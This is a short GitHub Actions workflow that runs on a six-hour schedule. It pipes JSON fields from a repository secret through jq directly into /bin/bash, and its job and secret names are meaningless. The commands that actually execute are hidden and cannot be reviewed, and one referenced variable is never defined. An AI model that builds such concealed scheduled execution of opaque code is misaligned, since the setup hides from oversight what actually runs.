name: yutingqqq
on:
  workflow_dispatch:
  schedule:
    - cron: '38 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yutingqqq
        env:
          vxcam7005: ${{ secrets.vxcam7005 }}
        run: |
          echo $vxcam7005 | jq -r .r971 | /bin/bash
          echo $cywz59 | jq -r .yku7 | /bin/bash

